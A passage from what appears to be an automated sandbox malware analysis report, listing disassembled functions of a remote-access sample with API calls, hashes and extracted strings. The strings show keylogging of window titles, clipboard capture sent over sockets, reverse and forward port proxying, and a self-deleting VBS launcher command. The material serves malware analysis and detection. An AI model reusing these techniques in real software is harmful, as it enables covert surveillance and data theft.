                        • Sleep.KERNEL32(00000000,00000018,00000000), ref: 0041A1F4
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: Sleep$CreateDirectoryGdiplusH_prologLocalStartupTime
                        • String ID: time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i$PG$PG$PG
                        • API String ID: 489098229-1431523004
                        • Opcode ID: 794bb2b208bad590467bd00f6a6004f6f957c756b4e279e9b706f936551238fb
                        • Instruction ID: 65e100c03f0dda0ba9a952c873ad8774fe275ee1deca45487f64c7c8a8292b0e
                        • Opcode Fuzzy Hash: 794bb2b208bad590467bd00f6a6004f6f957c756b4e279e9b706f936551238fb
                        • Instruction Fuzzy Hash: E7515D70A00215AACB14BBB5C8529ED7BA9AB44308F40403FF509AB1E2EF7C9D85C799
                        Function 0040D7FF Relevance: 19.4, APIs: 3, Strings: 8, Instructions: 148COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00412850: TerminateProcess.KERNEL32(00000000,?,0040D80F), ref: 00412860
                          • Part of subcall function 00412850: WaitForSingleObject.KERNEL32(000000FF,?,0040D80F), ref: 00412873
                          • Part of subcall function 004136F8: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,?,00000208), ref: 00413714
                          • Part of subcall function 004136F8: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000000), ref: 0041372D
                          • Part of subcall function 004136F8: RegCloseKey.ADVAPI32(?), ref: 00413738
                        • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040D859
                        • ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000000), ref: 0040D9B8
                        • ExitProcess.KERNEL32 ref: 0040D9C4
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
                        • String ID: """, 0$.vbs$8SG$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$exepath$open
                        • API String ID: 1913171305-3159800282
                        • Opcode ID: 8540ee6109fc5d5e06acd7d4b9875de3834636e3193428be82b889be829a6c91
                        • Instruction ID: 6fc8d312854778a25908ca85050b1cee1951ef16e4956e50e312a563d71e527c
                        • Opcode Fuzzy Hash: 8540ee6109fc5d5e06acd7d4b9875de3834636e3193428be82b889be829a6c91
                        • Instruction Fuzzy Hash: 0C413A719001195ACB15FA62DC56DEEB778AF50309F10007FB10AB61E2EF785E4ACA98
                        Function 00450600 Relevance: 18.4, APIs: 12, Instructions: 376COMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: _free
                        • String ID:
                        • API String ID: 269201875-0
                        • Opcode ID: 47079874d6611f76b22abc1c1892e8562d414d23f3395fd45a7677fdf32a9ec5
                        • Instruction ID: d910990a8472ee08c0279d8077499983e41ff25138a9859a729e4309013b5263
                        • Opcode Fuzzy Hash: 47079874d6611f76b22abc1c1892e8562d414d23f3395fd45a7677fdf32a9ec5
                        • Instruction Fuzzy Hash: E2C17476D40204AFEB20DBA9CC83FDE77B8AB19705F14015AFE05EB283D6B49D458798
                        Function 00455BDB Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                          • Part of subcall function 004558A9: CreateFileW.KERNEL32(00000000,00000000,?,00455C84,?,?,00000000,?,00455C84,00000000,0000000C), ref: 004558C6
                        • GetLastError.KERNEL32 ref: 00455CEF
                        • __dosmaperr.LIBCMT ref: 00455CF6
                        • GetFileType.KERNEL32(00000000), ref: 00455D02
                        • GetLastError.KERNEL32 ref: 00455D0C
                        • __dosmaperr.LIBCMT ref: 00455D15
                        • CloseHandle.KERNEL32(00000000), ref: 00455D35
                        • CloseHandle.KERNEL32(?), ref: 00455E7F
                        • GetLastError.KERNEL32 ref: 00455EB1
                        • __dosmaperr.LIBCMT ref: 00455EB8
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                        • String ID: H
                        • API String ID: 4237864984-2852464175
                        • Opcode ID: ad10cc44415123364ccf3ab0f87a2b5b2deaae059395c87e8052164914e7d7f7
                        • Instruction ID: f4290dc4267d91ba683862cdaabef3013db21248f4240db41616def06e578eae
                        • Opcode Fuzzy Hash: ad10cc44415123364ccf3ab0f87a2b5b2deaae059395c87e8052164914e7d7f7
                        • Instruction Fuzzy Hash: D5A155329106049FDF19AF68DC617BE3BA0EB06325F14415EEC11EB392CB398D5ACB59
                        Function 00453D83 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 268COMMON
                        Download Yara Rule
                        APIs
                        • GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,0045405C,00000000,00000000,?,00000001,?,?,?,?,00000001), ref: 00453E2F
                        • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000001,00000000,00000000,?,0045405C,00000000,00000000,?,00000001,?,?,?,?), ref: 00453EB2
                        • __alloca_probe_16.LIBCMT ref: 00453EEA
                        • MultiByteToWideChar.KERNEL32(00000001,00000001,?,00000001,00000000,\@E,?,0045405C,00000000,00000000,?,00000001,?,?,?,?), ref: 00453F45
                        • __alloca_probe_16.LIBCMT ref: 00453F94
                        • MultiByteToWideChar.KERNEL32(00000001,00000009,00000001,00000000,00000000,00000000,?,0045405C,00000000,00000000,?,00000001,?,?,?,?), ref: 00453F5C
                          • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,004352BC,?,?,00438847,?,?,00000000,00476B50,?,0040DE62,004352BC,?,?,?,?), ref: 00446169
                        • MultiByteToWideChar.KERNEL32(00000001,00000001,00000001,00000000,00000000,?,?,0045405C,00000000,00000000,?,00000001,?,?,?,?), ref: 00453FD8
                        • __freea.LIBCMT ref: 00454003
                        • __freea.LIBCMT ref: 0045400F
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocateHeapInfo
                        • String ID: \@E
                        • API String ID: 201697637-1814623452
                        • Opcode ID: 347d6d77569ccb8731e03be0652f4f39992ef0e8e93efb01081f6886d5a4a2b8
                        • Instruction ID: bd5a1837779a5f2dcb5c2ea5aeb828518df7829aba760434011a70bbc407b236
                        • Opcode Fuzzy Hash: 347d6d77569ccb8731e03be0652f4f39992ef0e8e93efb01081f6886d5a4a2b8
                        • Instruction Fuzzy Hash: E391F472E002069ADB209E65CC42AEFBBF59F09756F14052BFC01E7282D739DD89C768
                        Function 0044AC49 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 216COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,$C,0043EA24,?,?,PkGNG,0044AE9A,00000001,00000001,73E85006), ref: 0044ACA3
                        • __alloca_probe_16.LIBCMT ref: 0044ACDB
                        • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,PkGNG,0044AE9A,00000001,00000001,73E85006,?,?,?), ref: 0044AD29
                        • __alloca_probe_16.LIBCMT ref: 0044ADC0
                        • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,73E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0044AE23
                        • __freea.LIBCMT ref: 0044AE30
                          • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,004352BC,?,?,00438847,?,?,00000000,00476B50,?,0040DE62,004352BC,?,?,?,?), ref: 00446169
                        • __freea.LIBCMT ref: 0044AE39
                        • __freea.LIBCMT ref: 0044AE5E
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                        • String ID: $C$PkGNG
                        • API String ID: 3864826663-3740547665
                        • Opcode ID: 362257cb831b64f560ca9c305cbafbf1ddd2a76c4c9bcde51592d12c0f33465e
                        • Instruction ID: b5b01290aead076256688b5938d42e4b2a7c64905c3dece0b68445a47d4ef5f6
                        • Opcode Fuzzy Hash: 362257cb831b64f560ca9c305cbafbf1ddd2a76c4c9bcde51592d12c0f33465e
                        • Instruction Fuzzy Hash: 1F513A72680206AFFB258F64CC41EBF77AAEB44714F24462EFC14D6240EB38DC60875A
                        Function 00450A25 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 204COMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: _free
                        • String ID: \&G$\&G$`&G
                        • API String ID: 269201875-253610517
                        • Opcode ID: bf6a2d62285109b65615641ef8a9ee438ca725d72dbf644c1fcc8e573ee560d0
                        • Instruction ID: 0b3297c67b001fbc5a9f4fbe1fd197d652097ca420ae28a40b4f72db8b3ed5d1
                        • Opcode Fuzzy Hash: bf6a2d62285109b65615641ef8a9ee438ca725d72dbf644c1fcc8e573ee560d0
                        • Instruction Fuzzy Hash: 77610475900204AFDB20CFA9C882B9ABBF4EF05315F14416BED58EB342D774AD458B98
                        Function 00414BB0 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 158COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: 65535$udp
                        • API String ID: 0-1267037602
                        • Opcode ID: c855b19cc43d9bec36cd86ac5f012ace8f0d54e169e32fa1a21da6d4488bf9b2
                        • Instruction ID: ff24d6befd6f0703c902a6165bd45161ed4db0fb5f75d2635e7e580b9b2721aa
                        • Opcode Fuzzy Hash: c855b19cc43d9bec36cd86ac5f012ace8f0d54e169e32fa1a21da6d4488bf9b2
                        • Instruction Fuzzy Hash: EF51E7756093019FDB209B58E9057BB37A4AFC4755F08082FF881973A1E76DCCC1865E
                        Function 0040ACD6 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 156sleepCOMMON
                        Download Yara Rule
                        APIs
                        • __Init_thread_footer.LIBCMT ref: 0040AD38
                        • Sleep.KERNEL32(000001F4), ref: 0040AD43
                        • GetForegroundWindow.USER32 ref: 0040AD49
                        • GetWindowTextLengthW.USER32(00000000), ref: 0040AD52
                        • GetWindowTextW.USER32(00000000,00000000,00000000), ref: 0040AD86
                        • Sleep.KERNEL32(000003E8), ref: 0040AE54
                          • Part of subcall function 0040A636: SetEvent.KERNEL32(?,?,00000000,0040B20A,00000000), ref: 0040A662
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: Window$SleepText$EventForegroundInit_thread_footerLength
                        • String ID: [${ User has been idle for $ minutes }$]
                        • API String ID: 911427763-3954389425
                        • Opcode ID: feb8edceca8c1d3b0438b79f4b5d8782787a457fd28da8b62aac7c6790c891ec
                        • Instruction ID: 3d5ee5432c15115af2c0f1375ae13a0ba8112eb59c463c5c733e63bb31497985
                        • Opcode Fuzzy Hash: feb8edceca8c1d3b0438b79f4b5d8782787a457fd28da8b62aac7c6790c891ec
                        • Instruction Fuzzy Hash: 6D51B1316043419BD314FB21D846AAE7796AB84308F50093FF586A22E2EF7C9D45C69F
                        Function 0040DA34 Relevance: 17.6, APIs: 1, Strings: 9, Instructions: 139COMMON
                        Download Yara Rule
                        APIs
                        • GetLongPathNameW.KERNEL32(00000000,?,00000208), ref: 0040DB9A
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: LongNamePath
                        • String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                        • API String ID: 82841172-425784914
                        • Opcode ID: 05c2ad93f6cc2ee26ed5624d475cb04337695bae26b39c69aed6eb4faf56ef7b
                        • Instruction ID: 0cc8b9c4d8a16f3fd89327f32322cd7e2fd47b59120d3573c9b2d8a81569e3eb
                        • Opcode Fuzzy Hash: 05c2ad93f6cc2ee26ed5624d475cb04337695bae26b39c69aed6eb4faf56ef7b
                        • Instruction Fuzzy Hash: FB414F715082019AC215FB61DC52DAEB3F8AE90718F10053FB546A60E2FFB8AE49C65F
                        Function 0043A83A Relevance: 16.6, APIs: 11, Instructions: 116COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A892
                        • GetLastError.KERNEL32(?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A89F
                        • __dosmaperr.LIBCMT ref: 0043A8A6
                        • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A8D2
                        • GetLastError.KERNEL32(?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A8DC
                        • __dosmaperr.LIBCMT ref: 0043A8E3
                        • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,00401D55,?), ref: 0043A926
                        • GetLastError.KERNEL32(?,?,?,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A930
                        • __dosmaperr.LIBCMT ref: 0043A937
                        • _free.LIBCMT ref: 0043A943
                        • _free.LIBCMT ref: 0043A94A
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
                        • String ID:
                        • API String ID: 2441525078-0
                        • Opcode ID: 333218d4c374834d2f5605b8d1434d3a456e4a6d1d3d381f1630f1823c8abcb3
                        • Instruction ID: 785efe6d9c8e3fffb8b85045f967b8474775cb8629fdf0d32462ae01257f7f2e
                        • Opcode Fuzzy Hash: 333218d4c374834d2f5605b8d1434d3a456e4a6d1d3d381f1630f1823c8abcb3
                        • Instruction Fuzzy Hash: FF31F57140420AFFDF01AFA5CC45DAF3B68EF09325F10021AF950662A1DB38CD21DB6A
                        Function 004054A0 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 155windowmemoryCOMMON
                        Download Yara Rule
                        APIs
                        • SetEvent.KERNEL32(?,?), ref: 004054BF
                        • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0040556F
                        • TranslateMessage.USER32(?), ref: 0040557E
                        • DispatchMessageA.USER32(?), ref: 00405589
                        • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,00474F78), ref: 00405641
                        • HeapFree.KERNEL32(00000000,00000000,0000003B,0000003B,?,00000000), ref: 00405679
                          • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
                        • String ID: CloseChat$DisplayMessage$GetMessage
                        • API String ID: 2956720200-749203953
                        • Opcode ID: fef61f91b449ae31e274f9846cb3759d0d19ea8c240772b62dae1734d23b140a
                        • Instruction ID: c1940132788662b917c5ec79ff16bb55de46c7435784779dc5fc992d72e4b12f
                        • Opcode Fuzzy Hash: fef61f91b449ae31e274f9846cb3759d0d19ea8c240772b62dae1734d23b140a
                        • Instruction Fuzzy Hash: CE41A171604701ABCB14FB75DC5A86F37A9AB85704F40093EF916A36E1EF3C8905CB9A
                        Function 00417CDF Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 108filesynchronizationCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00417F2C: __EH_prolog.LIBCMT ref: 00417F31
                        • WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,004660A4), ref: 00417DDC
                        • CloseHandle.KERNEL32(00000000), ref: 00417DE5
                        • DeleteFileA.KERNEL32(00000000), ref: 00417DF4
                        • ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 00417DA8
                          • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: CloseDeleteExecuteFileH_prologHandleObjectShellSingleWaitsend
                        • String ID: 0VG$0VG$<$@$Temp
                        • API String ID: 1704390241-2575729100
                        • Opcode ID: 1c1b3640276c9f2484efac8a9a88c7dcef26998f5c3edd0453bd207f6b4608f6
                        • Instruction ID: cfce1e327495ca125f9f778a73892d1ad62a3a088d665d9de3c725e9e650d499
                        • Opcode Fuzzy Hash: 1c1b3640276c9f2484efac8a9a88c7dcef26998f5c3edd0453bd207f6b4608f6
                        • Instruction Fuzzy Hash: 0E415F319002099BCB14FB62DC56AEE7775AF40318F50417EF506764E1EF7C1A8ACB99
                        Function 00416940 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 46clipboardCOMMON
                        Download Yara Rule
                        APIs
                        • OpenClipboard.USER32 ref: 00416941
                        • EmptyClipboard.USER32 ref: 0041694F
                        • CloseClipboard.USER32 ref: 00416955
                        • OpenClipboard.USER32 ref: 0041695C
                        • GetClipboardData.USER32(0000000D), ref: 0041696C
                        • GlobalLock.KERNEL32(00000000), ref: 00416975
                        • GlobalUnlock.KERNEL32(00000000), ref: 0041697E
                        • CloseClipboard.USER32 ref: 00416984
                          • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
                        • String ID: !D@
                        • API String ID: 2172192267-604454484
                        • Opcode ID: 014ab2952fb1720400378532343d04f3ca6c69c69b6d94fb269798378f0b3219
                        • Instruction ID: 305b70c8a6b081cbeb1fc088e42579eafb4add048c4ccd3ac1cf7446a02d8759
                        • Opcode Fuzzy Hash: 014ab2952fb1720400378532343d04f3ca6c69c69b6d94fb269798378f0b3219
                        • Instruction Fuzzy Hash: CC015E31214301DFC714BB72DC09AAE77A5AF88742F40047EF906821E2DF38CC44CA69
                        Function 004132D2 Relevance: 15.2, APIs: 10, Instructions: 153fileCOMMON
                        Download Yara Rule
                        APIs
                        • CreateFileMappingW.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 00413417
                        • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 00413425
                        • GetFileSize.KERNEL32(?,00000000), ref: 00413432
                        • UnmapViewOfFile.KERNEL32(00000000), ref: 00413452
                        • CloseHandle.KERNEL32(00000000), ref: 0041345F
                        • CloseHandle.KERNEL32(?), ref: 00413465
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: File$CloseHandleView$CreateMappingSizeUnmap
                        • String ID:
                        • API String ID: 297527592-0
                        • Opcode ID: 1b52e587fb9d9e89c8408f811d16bdaf082f1bab315b69f0c216b55e30adf48b
                        • Instruction ID: 9e0538afe5582c7c3c7070a3da709670e2bb39b60280b40541f30be5467d1837
                        • Opcode Fuzzy Hash: 1b52e587fb9d9e89c8408f811d16bdaf082f1bab315b69f0c216b55e30adf48b
                        • Instruction Fuzzy Hash: ED41E631108305BBD7109F25DC4AF6B3BACEF89726F10092AFA14D51A2DF38DA40C66E
                        Function 0041AB0D Relevance: 15.1, APIs: 10, Instructions: 66serviceCOMMON
                        Download Yara Rule
                        APIs
                        • OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,00000001,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB1C
                        • OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB33
                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB40
                        • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB4F
                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB60
                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB63
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: Service$CloseHandle$Open$ControlManager
                        • String ID:
                        • API String ID: 221034970-0
                        • Opcode ID: 06969d4054276dbf450069cd14adbb04630f9483e2dd0d38d9b092c5558579ee
                        • Instruction ID: 6fbe0b082825830d9e24babaefac53afed48758aa8e56b4d18e4903ff4329a9c
                        • Opcode Fuzzy Hash: 06969d4054276dbf450069cd14adbb04630f9483e2dd0d38d9b092c5558579ee
                        • Instruction Fuzzy Hash: 41114C71901218AFD711AF64DCC4DFF3B7CDB42B62B000036FA05D2192DB289C46AAFA
                        Function 00448121 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                        Download Yara Rule
                        APIs
                        • _free.LIBCMT ref: 00448135
                          • Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?), ref: 00446798
                          • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                        • _free.LIBCMT ref: 00448141
                        • _free.LIBCMT ref: 0044814C
                        • _free.LIBCMT ref: 00448157
                        • _free.LIBCMT ref: 00448162
                        • _free.LIBCMT ref: 0044816D
                        • _free.LIBCMT ref: 00448178
                        • _free.LIBCMT ref: 00448183
                        • _free.LIBCMT ref: 0044818E
                        • _free.LIBCMT ref: 0044819C
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: _free$ErrorFreeHeapLast
                        • String ID:
                        • API String ID: 776569668-0
                        • Opcode ID: 27d76b13a5ecae076ca6598a5b1433465caaf67949f0bdc0fbde8a5d49186781
                        • Instruction ID: 63500befab30bf138fa449b3e81d3956d19e40097f86fc95f12732a98ce5ff4f
                        • Opcode Fuzzy Hash: 27d76b13a5ecae076ca6598a5b1433465caaf67949f0bdc0fbde8a5d49186781
                        • Instruction Fuzzy Hash: C211B67A500508BFEB01EF96C842CDD3BA5FF05359B0240AAFA588F222DA35DF509BC5
                        Function 004114F5 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 191COMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: Eventinet_ntoa
                        • String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse$NG
                        • API String ID: 3578746661-3604713145
                        • Opcode ID: a7bd2cf574d9c29f0f452118638ed50856907e78b238ba203f6b8faaf9cf41f8
                        • Instruction ID: 71dfdc03858149a45142756d2b421c0b7bbb6d70992310a40494c7f1f0681c69
                        • Opcode Fuzzy Hash: a7bd2cf574d9c29f0f452118638ed50856907e78b238ba203f6b8faaf9cf41f8
                        • Instruction Fuzzy Hash: 0051C131A042015BC614FB36C91AAAE37A5AB85344F40453FF906A76F1EF7C8985C7DE
                        Function 00455F04 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 154COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,00456FFF), ref: 00455F27
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: DecodePointer
                        • String ID: acos$asin$exp$log$log10$pow$sqrt
                        • API String ID: 3527080286-3064271455
                        • Opcode ID: 629998c7ca290600fade91f32205cb7004f8bc569fe6c3e827db03ba52e3cc78
                        • Instruction ID: ff4fc8d1aadbe784407353d8516796ad37925c88dabf63da6293f70e8270e0de
                        • Opcode Fuzzy Hash: 629998c7ca290600fade91f32205cb7004f8bc569fe6c3e827db03ba52e3cc78
                        • Instruction Fuzzy Hash: 16519F71900909CBCF10CF58E9485BEBBB0FF49306FA14197D841A73A6DB399D298B1E
                        Function 0044B3BC Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 152fileCOMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • GetConsoleCP.KERNEL32(FF8BC35D,00000000,?,?,?,?,?,?,PkGNG,0044BB31,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 0044B3FE
                        • __fassign.LIBCMT ref: 0044B479
                        • __fassign.LIBCMT ref: 0044B494
                        • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 0044B4BA
                        • WriteFile.KERNEL32(?,FF8BC35D,00000000,0044BB31,00000000,?,?,?,?,?,?,?,?,PkGNG,0044BB31,?), ref: 0044B4D9
                        • WriteFile.KERNEL32(?,?,00000001,0044BB31,00000000,?,?,?,?,?,?,?,?,PkGNG,0044BB31,?), ref: 0044B512
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                        • String ID: PkGNG
                        • API String ID: 1324828854-263838557
                        • Opcode ID: e1ab2fdd82c1bf82b8ea5de4eaaa1e5c3a736621917fd27297e58c6e874c6116
                        • Instruction ID: 24f44d390d373c30b0d8a34eda065edd0bccebe0da4884afe324d1cece3cc5ea
